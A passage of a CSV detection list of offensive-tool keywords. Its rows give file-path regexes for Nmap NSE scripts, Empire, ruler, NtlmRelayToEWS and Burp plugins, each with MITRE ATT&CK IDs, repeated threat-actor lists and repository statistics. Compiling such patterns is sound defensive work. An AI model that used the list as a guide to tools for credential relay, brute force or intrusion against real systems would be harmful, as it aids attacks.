Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7872" "*/http-fileupload-exploiter.nse*",".{0,1000}\/http\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7873" "*/http-form-brute.nse*",".{0,1000}\/http\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7874" "*/http-form-fuzzer.nse*",".{0,1000}\/http\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7875" "*/http-frontpage-login.nse*",".{0,1000}\/http\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7876" "*/http-generator.nse*",".{0,1000}\/http\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7877" "*/http-git.nse*",".{0,1000}\/http\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7878" "*/http-gitweb-projects-enum.nse*",".{0,1000}\/http\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7879" "*/http-google-malware.nse*",".{0,1000}\/http\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7880" "*/http-grep.nse*",".{0,1000}\/http\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7881" "*/http-headers.nse*",".{0,1000}\/http\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7882" "*/http-hp-ilo-info.nse*",".{0,1000}\/http\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7883" "*/http-huawei-hg5xx-vuln.nse*",".{0,1000}\/http\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7884" "*/http-icloud-findmyiphone.nse*",".{0,1000}\/http\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7885" "*/http-icloud-sendmsg.nse*",".{0,1000}\/http\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7886" "*/http-iis-short-name-brute.nse*",".{0,1000}\/http\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7887" "*/http-iis-webdav-vuln.nse*",".{0,1000}\/http\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7888" "*/http-internal-ip-disclosure.nse*",".{0,1000}\/http\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7889" "*/http-joomla-brute.nse*",".{0,1000}\/http\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7890" "*/http-jsonp-detection.nse*",".{0,1000}\/http\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7891" "*/http-lexmark-version.nse*",".{0,1000}\/http\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","7892" "*/http-lfi.nse*",".{0,1000}\/http\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7893" "*/http-litespeed-sourcecode-download.nse*",".{0,1000}\/http\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7894" "*/HTTP-Login.ps1*",".{0,1000}\/HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - 
PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7895" "*/http-ls.nse*",".{0,1000}\/http\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7896" "*/http-majordomo2-dir-traversal.nse*",".{0,1000}\/http\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7897" "*/http-malware-host.nse*",".{0,1000}\/http\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7898" "*/http-mcmp.nse*",".{0,1000}\/http\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7899" "*/http-methods.nse*",".{0,1000}\/http\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7900" "*/http-method-tamper.nse*",".{0,1000}\/http\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7901" "*/http-mobileversion-checker.nse*",".{0,1000}\/http\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7902" "*/http-nikto-scan.nse*",".{0,1000}\/http\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7903" "*/http-ntlm/ntlmtransport*",".{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","7904" "*/http-ntlm-info.nse*",".{0,1000}\/http\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7905" "*/http-open-proxy.nse*",".{0,1000}\/http\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7906" "*/http-open-redirect.nse*",".{0,1000}\/http\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7907" "*/http-passwd.nse*",".{0,1000}\/http\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7908" "*/http-phpmyadmin-dir-traversal.nse*",".{0,1000}\/http\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7909" "*/http-phpself-xss.nse*",".{0,1000}\/http\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7910" "*/http-php-version.nse*",".{0,1000}\/http\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7911" "*/http-proxy-brute.nse*",".{0,1000}\/http\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7912" "*/http-put.nse*",".{0,1000}\/http\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7913" "*/http-qnap-nas-info.nse*",".{0,1000}\/http\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7915" "*/http-referer-checker.nse*",".{0,1000}\/http\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7916" "*/httprelayserver.py*",".{0,1000}\/httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","7917" "*/http-request-smuggler/*",".{0,1000}\/http\-request\-smuggler\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","7918" "*/http-rfi-spider.nse*",".{0,1000}\/http\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7919" "*/http-robots.txt.nse*",".{0,1000}\/http\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
